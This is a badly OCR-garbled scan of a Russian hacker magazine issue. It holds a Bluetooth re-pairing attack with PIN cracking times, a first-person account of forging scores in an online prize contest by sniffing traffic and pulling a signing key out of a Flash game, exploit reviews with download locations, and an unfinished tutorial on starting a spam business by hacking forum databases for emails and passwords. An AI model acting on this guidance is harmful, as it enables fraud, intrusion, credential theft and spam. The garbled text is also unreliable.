Изучим этот вопрос немного деликатнее. Для начала представим, 
что два устройства успели связаться, сохранить ключ связи КаЬ 
и уже перешли к стадии МиШаІ аиІГіепІісаІіоп. Далее надо заста- 
вить железячки заново «спариться». В общей сложности описано 
три метода атаки на пересопряже- 
ние, причем каждая из них зависит 
от качества реализации ВІиеіооіЬ- 
ядра в конкретном апарате. Вот эти 
методы в порядке эффективности: 



ВТ-устройства обмениваются 
І_К_ЯАШ-числами, защищенными 
КіпіпГом. Впоследствии будет 
создан КаЬ-кеу по алгоритму Е21 
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ЗАМЕТК И К КЕ-РАІКШС АТАКЕ 

1. Спецификация ВІеШогЬ -протокола допускает, что устройство может забыть ключ связи (Ипк кеу) 

и запросить повтор процесса спряжения. Благодаря этому атака на «пересопряжение» стала осуществима 

2. Атака на пересопряжение — активный процесс, и, чтобы его осуществить, необходимо отправить 
сообщение в точный момент обмена данными. Как ты уже понял, стандартные устройства (которые 
продают в магазине за углом) не подходят для реализации подобного рода действий. Для этого нуж- 
но специальное оборудование 

3. Если ведомое (зіаѵе) устройство проверяет на валидность ВБ-АББИ, с которого приходят дан- 
ные, взломщику необходимо этот адрес подделать и отправить в поле «зоигсе» пакета, требуемый 
ВБ_АГ)ВК, но это требует специфической аппаратуры! 

4. Если атака пройдет успешно, то связь между шоотус- девайсами оборвется, и пользователям 
придется снова вводить РПЧ. Если юзер не олень, то он сразу поймет, что тут какой-то подвох 
и не введет РШ заново. 




1 Как только паринг закончен, устройства переходят непосред- 
ственно к фазе аутентификации. Первым делом девайс Мазіег от- 
сылает АІІ_ВАІ\Ю-сообщение и ждет в ответ вычисленный ЗВЕЗ. 
Возможность потери ключа связи декларирована самим стандар- 
том связи. В этом случае зіаѵе-устройство посылает запрос 
«І_МР_поІ_ассеріесІ», чтобы тазіег знал, что ключ был утерян. Вы- 
ходит, как только главное устройство отошлет АІІ_ВАІ\Ю, хакеру 
останется только внедрить пакет с «І_МР_поі_ассер1:есІ» тазіег- 
девайсу. Уверенный в том, что зіаѵе действительно провафлил 
ключ, тазіег заново перезапускает процесс паринга. Причем пе- 
резапуск раігіпд-процедуры означает, что ключ связи больше не 
действителен и использоваться больше не будет. 

2 Второй метод атаки выглядит немного по-другому. В начале 
фазы аутентификации тазіег готовится отправить АІІ_ВАШ ве- 
домому устройству. Если взломщик успеет до этого отправить 
ІІ\І_ВАІ\Ю-сообщение зіаѵе-аппарату, то он будет думать, что 
мастер забыл ключ связи. Это заставит устройства переподклю- 
читься заново и еще раз провести сопряжение. 

3 Теперь третий вариант развития событий. Опять же во время ау- 
тентификации мастер шлет АІІ_ВАІ\Ю и ожидает принять в ответ 
посчитанный ЗРЕЗ. Если же вслед за отправкой АЕІ_ВАІ\Ю тазіег'у 
подсунуть от фонаря посчитанное ЗВЕЗ-сообщение, то аутенти- 
фикация будет считаться проваленной. После этого аппараты по- 



пытаются еще несколько раз (количество попыток зависит от уст- 
ройства) повторить аутентификацию. В какой-то момент, когда ко- 
личество неудачных попыток превысит лимит, основное устрой- 
ство объявит ошибку и потребует начать сопряжение заново. 

Эти методы описывают, как принудить девайсы «забыть» Ііпк 
кеу, что само по себе ведет к повторному раігіпд'у, а значит, зло- 
умышленник может подслушать весь процесс с самого начала, 
перехватить все важные сообщения и взломать РІІ\І. 

РЕЗУЛЬТАТЫ 

В принципе, я многое рассказал по этому поводу. В статье не 
упоминались лишь подробности работы алгоритмов Е22, Е21, Е1 
и особенности шифра ЗАРЕВ+, который является их основой, — 
это отдельный разговор. Так вот, только что описанная уязви- 
мость из разряда «критических», и это подтвердил сам Брюс 
Шнайер. Метод подбора РІІХГа на практике работает прекрасно, 
и вот результаты, которые он показал (Репііит IV ЗСГіг НТ): 

Длина РІІХГа Время (в секундах) 

4 0.063 

5 0.75 

6 7.609 

7 76.127 

Как видишь, увеличение длины пин-кода не особо помога- 
ет, и советовать его в качестве панацеи я не буду. Насчет 
того, что спаривать девайсы в людном месте и с подозри- 
тельными личностями вредно, я думаю, ты и так прекрасно 
знаешь. Скорее всего, пока создатели протокола тщатель- 
но не пересмотрят схему инициализации соединений и не 
предложат что-то концептуально новое, баг все еще будет 
актуален. Если проводить аналогию, то наиболее удачное 
сравнение будет с ѴѴі-Рі и ѴѴЕР-протоколом, о недочетах 
которого уже довольно много известно. Чем это грозит для 
рядового пользователя? Ничем приятным. Атака позволяет 
вылавливать и расшифровывать пакеты прямо во время 
передачи данных, что по сути является обычным снифин- 
гом. В теории, наверно, можно изменять/искажать содер- 
жание пакетов, которыми обмениваются девайсы. 



НАРРУ ЕЫО 

Впрочем, не буду сгущать краски. Я думаю, что атаки та- 
кого рода не будут слишком популярны среди хакеров до 
тех пор, пока под это дело энтузиасты не зарелизят 
удобный и функциональный софт. Впрочем, к тому вре- 
мени, как мне кажется, проблему в ВІиеГооіГі надлежа- 
щим образом проработают. А что сейчас? Сейчас я при- 
вел тебе только факты. Чтобы не подвергнуться взлому 
(даже таким изощренным способом), просто будь осто- 
рожнее и старайся обращать внимание на необычные 
ситуации, ведь если подумать, то никакая ошибка не мо- 
жет возникнуть просто так. 

ВІЫАВУ ѴСШВ’8 ~і~ 
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ВЕСЕЛЫЙ 

КОНКУРС 

ИСТОРИЯ О ТОМ, КАК ХАКЕРЫ ПОБЕЖДАЮТ 
В КОНКУРСАХ С ЦЕННЫМИ ПРИЗАМИ 



іік КОНЦУ ГОДА НА СКЛАДАХ ФИРМ, ТОРГУЮЩИХ ОРГТЕХНИКОЙ И ДРУГИМИ 
ЖЕЛЕЗНЫМИ ВКУСНОСТЯМИ, СКАПЛИВАЮТСЯ ИЗЛИШКИ ТОВАРА, КОТОРЫЕ НЕ- 
ОБХОДИМО ПО-БЫСТРОМУ СПЛАВИТЬ. ТЫ МОЖЕШЬ ВИДЕТЬ МНОЖЕСТВО ПРЕД- 
НОВОГОДНИХ РАСПРОДАЖ, СКИДОК И ПРОЧИХ ТРЮКОВ, ПРИМАНИВАЮЩИХ 
ЖАДНЫХ ДО ХАЛЯВЫ ЛЮДЕЙ. МНОГИЕ КОМПАНИИ В РЕКЛАМНЫХ ЦЕЛЯХ ОРГАНИ- 
ЗУЮТ РАЗНООБРАЗНЫЕ КОНКУРСЫ НА СВОИХ САЙТАХ, ЗА ПОБЕДУ И ДАЖЕ УЧАС- 
ТИЕ В КОТОРЫХ ДАЮТ ЦЕННЫЕ ПРИЗЫ. КАК ПРАВИЛО, ЭТИ КОНКУРСЫ РЕАЛИЗУ- 
ЮТСЯ КАК ПОПАЛО, И НАШЕМУ БРАТУ ЗДЕСЬ МОЖНО ПОЖИВИТЬСЯ 33 



ПОИСК ЖЕРТВЫ 

На самом дѳлѳ я довольно ленивый человек и поэтому никогда 
не участвовал в таких конкурсах, но в этот раз ко мне обратил- 
ся старый приятель, который всерьез захотел поднять к Новому 
2006 году какой-то новый девайс на халяву. Его стараниями бы- 
ло найдено несколько вполне солидных ресурсов. Мой рассказ 
об одном из них — самом привлекательном, с моей точки зре- 
ния, лишь от того, что создатели сайта хоть как-то позаботились 
о безопасности, чего нельзя сказать об остальных. 

Итак, это было что-то вроде заурядного опііпе-магазина с кучей 
компьютерного железа. Администрация проводила конкурс, 
в котором надо было сыграть в логическую игру. По результатам 
конкурса определялся один победитель, который получал очень 
даже солидный приз — ЖК монитор «РИіІірз 17066». Я не стал 
вчитываться в подробности акции, а просто порегался и сыграл 
несколько игр. Честно говоря, результат «вы на 11451 месте» 
меня не очень порадовал. Особенно, если учесть, что мониторов 
было не 1 2000, а всего один, и с таким количеством очков мне не 
светило его заполучить. 



ЛОВЛЯ НА ЖИВЦА 

Игра была реализована в виде РІазИ-ролика. Стакан заполнялся 
разноцветными шариками, которые надо было убирать группами 
одного цвета. Чем больше группа, тем больше очков получал игрок. 
Как только все оставшиеся шарики не образовывают ни одной 
группы, игра заканчивается, а результат передается на сервер, где 
записывается, сравнивался с таблицей рекордов, и в завершение 
всему пользователю возвращается число — место в таблице игро- 
ков. Полагается, что надо долго и упорно играть в игру, чтобы зара- 
ботать как можно больше очков и получить заветный приз. Однако 
именно это не входило в мои планы. Мне предстояло разобраться 
с тем, как именно выглядит взаимодействие между сервером и на- 
шим флешовым клиентом-игрой. Если я пойму, как реализована пе- 
редача данных, то смогу ответить на вопрос: возможно ли фальси- 
фицировать результаты игр и добиться требуемого результата. 
В принципе понятно, что ІІазИ-клиент передает серверу данные по 
протоколу НТТР, но как именно и каким методом — это вопрос. Воп- 
рос, ответить на который можно банально, отснифав сетевую ак- 
тивность во время игры и подсчета очков. 
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ОТСНИФАЛ ПАКЕТ С 
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ОБ ИГРЕ, КОТОРАЯ 
ОТСЫЛАЕТСЯ 
СЕРВЕРУ 



РАЗОБРАЛ ФЛЕШКУ, 
ПОЛУЧИВ ДОСТУП К 
АСТЮИЗСРІРТ-КОДУ 
ИГРЫ 



ПОСМОТРЕЛ, КАК 
ГЕНЕРИРУЕТСЯ 
ПОДПИСЬ 
ЗАПРОСА, И 
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СОЗДАВАТЬ 
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РЕЗУЛЬТАТ 



ВБИВАЮ 
АДЕКВАТНОЕ 
ЧИСЛО ОЧКОВ. 
КОНКУРС ВЗЛОМАН 
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Для этого я решил воспользоваться программой «ЕззепііаІ 
ЫеГГооІз 3.2», однако навязывать тебе свой выбор я не буду, так 
как ты уже достаточно взрослый, чтобы самостоятельно опреде- 
лять инструмент, с которым будешь работать. Я настроил ЫеГГооІз 
таким образом, чтобы программа слушала 127.0.0.1 :81/ТСР порт и 
показывала все данные, прилетающие туда. Затем в своем брау- 
зере я указал, что необходимо использовать проксик ІосаІИозІ:81 , 
и принялся играть. 

Как только последняя группа шариков была убрана, флешка на- 
чала долбиться к себе домой и сдала с потрохами своих созда- 
телей. Оказалось, что по окончании игры ІІазб-кпиент формиру- 
ет РОЗТ-запрос и отправляет его серверу. Причем в недрах зап- 
роса передаются следующие переменные: 

ІІа$Іік=0с248саеЬ075Ь660с39726е5ес449с52&асІіоп=асісі&етаіІ=с 

ооІ_хакер%40хакер_таіІ%2Еги&изегпате=изег_пате&роіп1:=302 

В структуре возвращаемых серверу данных разобраться очень легко. По- 
нятно, что роіпЬ302 — это число набранных очков, изетате=изег_пате — 
это имя пользователя, етаіІ=сооІ_хакер@хакер_таіІ.ги — мыло, асІіоп=асІсІ 
— какой-то флаг команды вроде «добавить рекорд». Единственная непо- 
нятка — что за параметр ИазІлк=0с248? Он состоит из 32-х символов и 
очень напоминает значение какой-то популярной хэш-функции 



вроде ГЛСІ5. Видимо, это своеобразная «подпись запроса», гаран- 
тирующая разработчикам конкурса достоверность данных. 
Действительно, когда я просто поменял количество набранных 
очков, то обломался: сервер вернул ошибку. Значит, в самом де- 
ле ТІазГік — это подпись запроса, строка, которая генерируется 
некоторым, пока неизвестным мне способом из остальных пере- 
менных и, возможно, какой-то еще вторичной информации вроде 
времени, даты или пинга до сервака. Я, конечно, утрирую, но га- 
дать здесь глупо — надо лезть в кишки ІІазИ-игры. 

ПРЕПАРИРОВАНИЕ 

Сейчас уже все более-менее представляют себе, что такое РІазИ. 
Это очень мощный инструмент для создания умных интерфейсов 
и роликов, который оперирует векторными объектами. Вся ани- 
мация и интерактив описываются на специальном языке 
АсІіопЗсгірІ Это свой собственный интерпретируемый язык прог- 
раммирования, который неразрывно связан с технологией РІазИ. 
Он имеет очень мощную объектную структуру и получил большое 
распространение и популярность, несмотря на свои не самые 
впечатляющие скоростные показатели. 

Однако могу поспорить, что далеко не все знают, что сценарий, 
управляющий ІІазИ-приложением, хранится в теле самого роли- 
ка в текстовом виде и может быть легко оттуда получен. То есть, 



ф.р^РГоОл^^ Р.І - ^НЛРИЙ^ 
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кишки ІІазИ-игры позволяют легко обойти 
«защиту» данных 



отловленный РОЗТ-запрос, который 
сгенерировала игрушка 



если у нас есть ІІазИ-ролик, получить управляющий АсІіопЗсгірІ- 
код не составляет труда. Для этого подойдет, например, прог- 
рамма «ЗѴѴР Оесотрііег МХ 2005с», которая, как я понял, явля- 
ется лидером в своей области. На ней и остановим свой выбор. 
Шароварная версия не будет долго работать, но нам на это нап- 
левать: хватит и пяти минут :). 

Скачав и установив программу, я открыл ІІазИ-и грушку и принял- 
ся изучать ее код. Немного пошарив, я наткнулся на функцию 
«ЗепсІЗсоге», которая и занималась тем, что отправляла резуль- 
тат на сервер. Нас с тобой интересуют лишь две ее строки: 

_ІосЗ.ТІазИк = _гооІсаІсМ05(5Ігіпд(пЗсоге) + _гооі.тукеу); 
_Іос3.зепсІАпсІІоасІ("Іп1:1:р://20от.спе\л/5.ги/ги/ТІазІпдатез/Тд.рИр" 
, _1ос4, "Р03Т"); 

В первой строке высчитывался наш непонятный параметр ІІазИк. 
Как видишь, он и впрямь считал тсІ5 хэш от строки, образован- 
ной соединением двух строк: наших очков и какой-то неизвест- 
ной пока переменной тукеу. 

Вторая строка производит сам запрос (методом РОЗТ), переда- 
вая серверу данные на обработку. Порыв исходники еще немно- 
го, я наткнулся на строку: 

тукеу = 

м зсІІі(д[і5еІ4кій_14893уШ\/\/384[іІІѵ\/_Зк4іШ39_41у3948134ік123498)"; 

Ну, туг и комментировать нечего, ведь это и есть наш секретный ключик. 

СТАВИМ РЕКОРДЫ 

Все сведения собраны, можно приступать к действиям. Как любитель 
языка РНР, я подделал запрос его средствами. Ты же можешь про- 
должить использовать ЫеГГооІз: эта программа умеет в том числе и 



еззеютаь ЫЕТТООЬЗ з.2 ^ 

Упомянутая в статья программа ЫегТооЬ 
іЧлАѵш.гатоз.ги') — функциональный инструмент для 
различных исследований. Может здорово помочь и в 
твоих электронных изысканиях, и в повседневной ра- 
боте. Программа включает в себя несколько инстру- 
ментов, среди которых я выделю следующие. 

- КегЗгаі (отображает список входящих и исходящих 
соединений вашего компьютера) 

- ИегБюк-сканер ЫВЗсап 

- Сканер ТСР-портов с кучей возможностей 

-Утилита 5Ьаге$ для контроля за внешними подклю- 
чениями к твоим шарам „ . , 

ЬМНовк — удобный редактор файла 1тПо$в 

- Утилита КаѵѵЗоскеі для работы с низкоуровневыми 
ТСР /ІЮР-соединениями 

- Менеджер процессов РгосМоп 

- Куча стандартных утилит вроде ТгасеКоШе, I ш§ 

и пзкіоор 



На диске ты найдешь документацию 
по программированию на АсііопЗсгірі. 
свежие версии программ, а также 
описание на человеческом языке про- 
токола НТТР. 



передавать запросы на удаленные серве- 
ры. Просто я человек практичный и напи- 
сал более или менее удобный сплоит. Поп- 
равив пару параметров, ты сможешь впи- 
сать в таблицу рекордов не только себя, 
но и маму, бабушку, собаку соседа и люби- 
мые тапочки. Или просто повторно добав- 
лять себя в рекорды, если кто-то особо одаренный скинет тебя с пь- 
едестала! Главное — иметь еще один существующий мыльник, ник и 
число очков, достаточных для рекорда, но и не выходящие за допус- 
тимые рамки. Об этом, кстати, нужно сказать отдельно. 

Поле имеет размер 11 на 12 клеток. Получается 132 шарика. На 5 
цветов в среднем приходится по 26,4 шарика каждого цвета. Прак- 
тика показала, что число шариков колеблется в пределах от 20 до 
35. Опытным путем я посчитал, как даются бонусы за группу опре- 
деленных размеров, и написал программку для определения бону- 
са любой группы. Теперь прикинем наши шансы. Допустим, нам 
очень повезло, и шарики в стакане упали в примерно равных долях 
по 26 штук. Причем нам удалось убрать их все кучками по 26 штук, 
получив за каждую кучку по 650 баллов. Получается 3250 баллов. 
Если в одной из кучек шаров окажется меньше, то в другой — боль- 
ше. Таким образом, общая сумма изменится не на много. Итак, 
3250 — это теоретический верхний предел, до которого можно 
«ставить рекорды». Скажу наперед, что эта сумма позже окажется 
умопомрачительной, с точки зрения администрации сайта, и все 
первые 20 человек перед завершением конкурса будут просто сре- 
заны из таблицы рекордов. 

Заглянем в таблицу первых 10 игроков. Какой-то Владимир занял 
последнее в десятке место, набрав 1900 баллов. Сейчас мы ему 
«поможем» встать на 1 1 место! 1902 балла как раз хватит. Вносим 
нужные значения в программу, запускаем ее на выполнение. 
Скрипт возвращает нам значение хэша для наших 1902 баллов. 
Его-то и надо подставить в НТТР-запрос. Далее нужно подсчитать 
длину тех самых «полезных» данных, которые получит сервер, что- 
бы сервер точно знал, сколько информации ему передают. Можно 
сделать это автоматически, но для наглядности я оставил все как 
есть. Еще раз запускаем скрипт на выполнение. Опа! Мы попали в 
таблицу рекордов. Жаль, что кто-то при этом ее покинул! 

НАГРАЖДЕНИЕ 

Время шло, и конкурс подходил к концу. Все больше и больше 
подозрительных личностей появлялось на первых местах (я тут 
ни при чем). Только за последние 2 дня меня раз 10 скинули с 
первого места. Каждый боялся перевалить за недопустимый 
предел и ставил рекорд на 2 — 4 балла выше прежнего. Гонка 
была замечена админами, и около 20 лидеров было кикнуто и за- 
банено в последний момент. На форуме развернулся нешуточ- 
ный спор, где и я успел принять участие. Полный игнор со сто- 
роны модераторов, да и просто плохая погода, убили всякую на- 
дежду получить главный приз. Хотя надеяться на это нельзя бы- 
ло с самого начала. 

Абсолютная некомпетентность и халатное отношение к столь 
серьезному вопросу привело устроителей конкурса к потере до- 
верия многих сотен, а то и тысяч своих посетителей. Я уже не го- 
ворю о репутации сайта. 

Шагая в ногу со временем, используя новые технологии, не за- 
бывай смотреть под эти самые ноги. Современный мир так про- 
низан и связан с глобальной Сетью, что, помимо дохода, может 
принести и не малый ущерб, если вовремя не остановиться, ре- 
шая вопросы, в которых сам ничего не смыслишь. Удачи! 

ВІЫАВУ УОІІВ’8 ЗС 



ЕІ 



Сайт с конкурсом, который я мучил: гоот.спеѵѵз.ги 
Сайт разработчиков Еззепііаі ІМеГГооІз: ѵѵѵѵѵѵ.іатоз.ги 
Сайт сосЬтины ЗѴѴР Ресотрііег: \шѵѵ.50ІЫпк.сот 
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Докучаев Дмитрий ака РогЬ (ЬгЬ@геаІ.хакер.ги) 

ЕХРЮІТЗ РЕ VI ЕЖ 



РІВЕРОХ 1 .5 ВІІРРЕРІ ОѴЕВРЮѴѴ ЕХРЮІТ М50ТС ВЕМОТЕ ЕХРЮІТ 



ІЕ «ѴѴІЫООѴѴО» (ЮАѴ ЕХРЮІТ 



описание: Корпорация МісгозоК снова от- 
личилась нестабильностью своих продуктов. 
На этот раз в риЫіс-источниках появился 
Обау эксплойт для Іпіегпеі Ехріогег 6.0. Баг 
актуален для версий ѴѴіп2к и ѴѴіпХР со всеми 
сервиспаками. 

Суть ошибки состоит в простом переполнении 
буфера (а какие могут быть еще ошибки в 
продуктах М3? :)), которое вызывается через 
функцию ѵѵіпсІоѵѵ() языка ЗаѵаЗсгірР Эксплойт 
состоит из 5 разных файлов. Стартовый НТМІ_ 
позволяет выбрать операционную систему. 
После клика по соответствующей ссылке не- 
замедлительно запустится калькулятор. Учи- 
тывая, что шелл-код во вредоносном файле 
ПНтет.Ыт можно легко изменить, эксплойт 
приравнивается к критическим :). 

защита: Как обычно, МісгозоТС довольно опе- 
ративно отреагировала на баг и выпустила пат- 
чи для уязвимых систем. Список заплаток мож- 
но найти на сайте ѵѵѵѵѵѵ.сотриіегіеггогізт.сот . 
Все патчи лежат еще на нашем диске. 

ссылки: Исходные коды всех НТМЬфайлов на- 
ходятся здесь: ( ѵѵѵѵѵѵ.зесигіМаЬ.ги/рос/ехіга^ 

242256.рІір) . Про техническую реализацию уяз- 
вимости можно прочитать на ресурсе ННр://зеси- 
гіЪлппоѵ.ги/Кбоситепі294.ІіітІ . ОпЫпе-версия 
эксплойта живет на странице ѵѵѵѵѵѵ.сотриіегіег- 
гогізт.сот/гезеагсН/іе/рос.Іііт . 

злоключение: Данный эксплойт будут ис- 
пользовать многие хакеры. Во-первых, с по- 
мощью такого средства можно легко загрузить 
какого-нибудь бота или трояна, а во-вторых, 
легко скачать необходимую информацию с 
компьютера недруга, используя стандартные 
приемы социальной инженерии. В общем, дан- 
ный сплоит — реальная вещь, которая редко 
появляется в публичных источниках. 

дгееіз: Автором эксплойта является хакер 
с ником Зіиагі Реагзоп из команды СотріЛег 
Теггогізт (ѵѵѵѵѵѵ.сот рійегіеггогізт .сот) . 
Пожелаем ему удачи и в дальнейших релизах :). 



описание: Этот месяц выдался урожайным в 
плане эксплойтов против известных браузе- 
ров. Если дырке в ІЕ никто не удивился, то пе- 
реполнение буфера в элитном браузере 
РігеРох заставило многих задуматься. Сам 
эксплойт не занимает много кода, так как 
только аварийно завершает программу. Но я 
больше чем уверен, что в закрытых источни- 
ках содержится код, запускающий какое-либо 
приложение. 

Переполнение буфера осуществляется за счет 
формирования длинного заглавия документа 
(5000 символов). Это происходит после нажа- 
тия на ссылку с вызовом простенького 
ЗаѵаЗсгірГа. 

защита: На данный момент защиты от эксплой- 
та не существует. Ошибка обнаружена в пос- 
ледней версии браузера и проверена на сис- 
темах ѴѴіп2к и ѴѴіпХр+ЗР2 (второй вариант 
проверен лично мной :)). 

ссылки: Текст эксплойта можно найти на стра- 
нице ѵѵѵѵѵѵ.5есип1ѵІаЬ.ги/рос/ехгга/242789.рІір . 
Здесь же находится техническое описание 
уязвимости. 

злоключение: Как уже было отмечено, ЭоЗ, 
проводимый эксплойтом, далеко не единствен- 
ное последствие. Быть может, скоро мы уви- 
дим сплоит, удаленно выполняющий произ- 
вольный код в одном из самом защищенном 
браузере. 

дгееіз: Свои способности в создании эксплой- 
тов нам показал чувак 2ІРІ_ОСК с козырным е- 
майлом зіскЬеаІ 2 @атаіІ.сот . Пишите ему свои 
вопросы, и он обязательно ответит :). 



описание: МісгозоТС в этом месяце оказа- 
лась под прицелом. Помимо бага в осле, хаке- 
ры запалили еще одну брешь в сервисе «ко- 
ординатор распределенных транзакций», ака 
МЗЭТС. Как оказалось, в этой службе зарыто 
переполнение буфера, которое при опреде- 
ленном раскладе может остановить систему 
либо выполнить произвольный код. 

Вообще, злоумышленники написали целых 
два вида этого коварного эксплойта: первый 
выполняет произвольный код (открывает порт 
с стй.ехе), второй выполняет ЭоЗ, останавли- 
вая работу всей системы. 

Что касается версий уязвимых систем, то 
эксплойту подвержены ѴѴІП2000, ѴѴіпХР, 
ѴѴіпХР+ЗРІ и ѴѴіп2003. Все остальные релизы 
неуязвимы. 

Сплоит написан на С++, поэтому для его ком- 
пиляции понадобится сборщик Ісс. Напоминаю, 
что взять его можно на ѵѵѵѵѵѵ.пзсі.ги . 

защита: Защититься от эксплойта можно пу- 
тем установки соответствующих заплаток от М3. 
Ссылки на патчи для ѴѴіп2к, ѴѴіпХР и ѴѴіп2003 
можно найти на странице: ѵѵѵѵѵѵ.зесигіМаЬ.ги/ѵиІ- 
пегаЬіІііѵ/241 002.рІір . 

ссылки: Эксплойт можно скачать по адресу 
ѵѵѵѵѵѵ.зесипМаЬ.ги/рос/ехіга/242546.рІір (вы- 
полнение произвольного кода) либо по ссыл- 
ке ѵѵѵѵѵѵ.зесигкѵІаЬ.ги/рос/ех1га/242546.рІір (от- 
каз в обслуживании). На странице ѵѵѵѵѵѵ.зесипіѵ- 
ІаЬ.ги/ѵиІпегаЬіІі^ѵ/зоигсе/241008.рІір ты найдешь 
техническую документацию на буржуйском языке. 

злоключение: Еще один эксплойт против 
МісгозоТС понизил репутацию корпорации на 
несколько пунктов. Но я уверен, что хакеры на 
этом не остановятся и будут исследовать сер- 
висы дяди Билла до исправления последней 
ошибки в коде ѴѴіпсІоѵѵз :). 

дгееіз: Эксплойт был написан хакером Зѵѵап 
(зѵѵап @ 0x557. огд) . который передает привет всем 
друзьям и тем, кто его знает и любит :). 
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ТЕХТ САША ЛЮБИМОВ + ДМИТРИЕВ ДАНИЛ / 334437228 / 



СПАМ С НУЛЯ 

КАК ПОДНИМАЮТ СВОЙ СПАМ-БИЗНЕС С НУЛЯ 

ВСЕМ НАМ ПРИХОДИТСЯ КАЖДЫЙ ДЕНЬ ВЫГРЕБАТЬ ИЗ ПОЧТОВОГО ЯЩИКА МЕГАБАЙТЫ ПИ- 
СЕМ СОМНИТЕЛЬНОГО СОДЕРЖАНИЯ С ПРЕДЛОЖЕНИЯМИ ПРИОБРЕСТИ ПАРУ ТОНН ПОДГ- 
НИВШЕЙ ТУШОНКИ, УВЕЛИЧИТЬ НЕКОТОРЫЕЧАСТИ СВОЕГО ТЕЛА, КУПИТЬ ОТПУГИВАТЕЛЬ 
СОБАК ИЛИ ПОСЕТИТЬ ПОЗНАВАТЕЛЬНЫЙ СЕМИНАР ПО УРОЛОГИЧЕСКОМУ МАССАЖУ. СЕ- 
ГОДНЯ НАСТАЛ МОМЕНТ, КОГДА МЫ С ТОБОЙ ЗАГЛЯНЕМ ПО ТУ СТОРОНУ БАРРИКАД И РАЗБЕ- 
РЕМСЯ С ТЕМ, КАК СЕТЕВЫЕ НЕГОДЯИ ПОДНИМАЮТ СОБСТВЕННЫЙ СПАМ-БИЗНЕО 



Прежде всего нужно разобраться 
с тем, что нужно для организации 
спам-рассылки. Список этот сос- 
тоит из нескольких пунктов. 




На нашем диске ты найдешь полные 
версии программ, описанных в этой статье. 



> 



БАЗА Е-МАИ.'ОВ ДЛЯ РАССЫЛКИ 

Под «базой» здесь понимается не тупой 
спамлист, а таблица с валидными адресами 
и некоторой дополнительной информацией, 
которая позволяет отсеивать только нужные 
адреса, которые подпадают под определен- 
ные критерии выборки. 

Например, в будущем к тебе может обратить- 
ся рекламодатель, который захочет провес- 
ти рассылку только по целевой аудитории: 
русскоговорящим жителям европейской час- 
ти РФ, мужчинам, интересующимся машина- 
ми. Вот здесь твоя база должна позволить 
осуществить выборку по большому числу 
критериев: географическое положение, раз- 
говорный язык, пол и список интересов (это 
самое главное). Сейчас мы подошли к серь- 
езной проблеме: где же можно достать такую 
«умную» базу? 

> Самый первый и простой вариант — прос- 
то купить ее. Найти продавцов баз можно на 
хакерских и асіиіі-форумах. Правда, среди 
них много кидал и выцепить человека, у кото- 
рого реально есть хорошие мыльники, очень 
трудно. Но можно, стоит лишь несколько не- 
дель пообщаться на форумах и ігс, как нуж- 
ный человек сам тебя найдет :). Базы можно 



также купить у компаний, занимающихся 
спамом. В большинстве случаев вместе с 
рассылкой рекламы клиентов такие компа- 
нии рассылают собственную рекламу с прай- 
сом на рассылку и покупку баз электронной 
почты. Цены колеблются от 1,5 до 6 тысяч 
рублей. К сожалению, те базы, которые выс- 
тавлены на продажу, представляют собой 
просто последовательность мыльников, и 
как-то таргетировать рассылки в этом случае 
будет очень сложно. Поэтому мы с тобой пе- 
реходим к следующему способу. 

> Как ты знаешь, в последнее время стано- 
вится все проще и проще взломать популяр- 
ный форум: большинство из них работают на 
бесплатных движках, дырявых как решето, и 
поэтому не надо быть хакером-гением, чтобы 
поломать очередную рНрВВ- или ІРВ-борду. 
Нас с тобой в этом процессе будет интересо- 
вать исключительно база пользователей с их 
е-таіі адресами. Сам понимаешь, такой под- 
ход почти полностью исключает битость адре- 
сов и дает близкую к 100% валидность ящи- 
ков. К тому же базы достанутся тебе абсолют- 
но бесплатно, а по тематике сайта и ветке фо- 
рума, где тот или иной человек проявляет на- 
ибольшую активность, можно будет судить об 



интересах твоих будущих адресатов. 

Еще в таблице с пользователями есть куча 
интересных полей, таких как поле раззѵѵогсі, 
расшифровав содержимое которого, можно 
попробовать подобрать пароль к номеру ась- 
ки, к мыльнику или сайту пользователя, если 
такой у него имеется. 

> Третий способ — настоящий баян, который 
с каждым днем теряет эффективность, и зат- 
раты на его реализацию растут. Как ты зна- 
ешь, существуют программы-спайдеры, кото- 
рые «ходят по сайтам и выдирают со страниц 
емейл-адреса». Возможно, ты удивлен, что я 
назвал этот способ «баяном», но он действи- 
тельно уже отживает свое. Дело в том, что та- 
ким способом довольно сложно найти боль- 
шое число валидных емейлов; многие адреса 
быстро умирают, а чтобы собрать нормаль- 
ный спам-лист, понадобится куча времени и 
интернет-трафика. Кроме того, существует 
довольно много людей, которые не оставляют 
упоминаний о своем мыле в общедоступных 
местах, либо применяют различные ухищре- 
ния, чтобы спрятать мыло от спам-пауков. К 
примеру, многие оставляют мыло в формате 
ѵазуа(аІ)таіІ(сІоІ)ги, а некоторые ушлепки во- 
обще кодируют адреса Ьазе64 :). 



Дены колеблются 
от 1,5 до 6 тысяч рублей 
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ТЕМНАЯ СТОРОНА 

После того как мы разобрались с составле- 
нием спам-базы, настало время устанавли- 
вать и использовать спамерский софт. Я рас- 
скажу тебе, как работать с очень популярной 
спамерской программой, которая носит наз- 
вание ОМЗ (Эігесі Магкеіід Зузіет). Между 
делом скажу, что ДМС в тот момент, когда по- 
пал ко мне в руки (это было, конечно, не по- 
завчера), стоил порядка $1500 — 2000. 

Уж за такие деньги стоило бы отточить и выли- 
зать этот комплект до блеска, — подумал я и, 
как всегда, ошибся. Итак, что же такое ЭМЗ? 
Это набор регі-скриптов, которые не только 
осуществляют рассылку, но и в придачу име- 
ют удобный веб-интерфейс, с помощью кото- 
рого возможно комфортно руководить про- 
цессом спама и, если есть необходимость, — 
приостановить его на время. Приступаем к ус- 
тановке. Первым делом нужно (любыми спо- 
собами) раздобыть архив с дистрибутивом 
ДМС. Добыл? :) Тогда поехали: 

ипгір сітз.гір 
ссі сітз; регі іпзіаіі.рі 

Скрипт начнет спрашивать, куда ставить комп- 
лект, какой использовать ЭОСІІМЕМТ_РіООТ и 
так далее. Я бы не стал менять эти значения, 
их можно составить по умолчанию. 

# ссі /Ііоте/сітз 

Тут следует процесс создания пользователя. 
Отойдя от темы, скажу, что ДМС работает с 
пользователями через ѵѵѵѵѵѵ, причем каждый 
пользователь имеет ограниченное количест- 
во одновременно запущенных спам-заданий. 
Но вернемся к нашим пользователям. Перед 
запуском сценария пеѵѵизег.рі его нужно 
слегка подправить: 



# ѵі пеѵѵизег.рі 

В самом начале следует переопределить 
значение переменной Збіраззѵѵсі, в которой 
указан путь к одноименной утилите (я наде- 
юсь, у тебя стоит апач, а то без него будет 
весьма проблематично). Теперь смотрим код 
скрипта далее: где-то в районе 40 — 41 стро- 
